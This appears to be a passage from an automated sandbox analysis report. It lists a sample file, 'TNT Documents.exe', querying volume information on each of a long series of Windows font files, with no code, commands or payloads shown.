Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
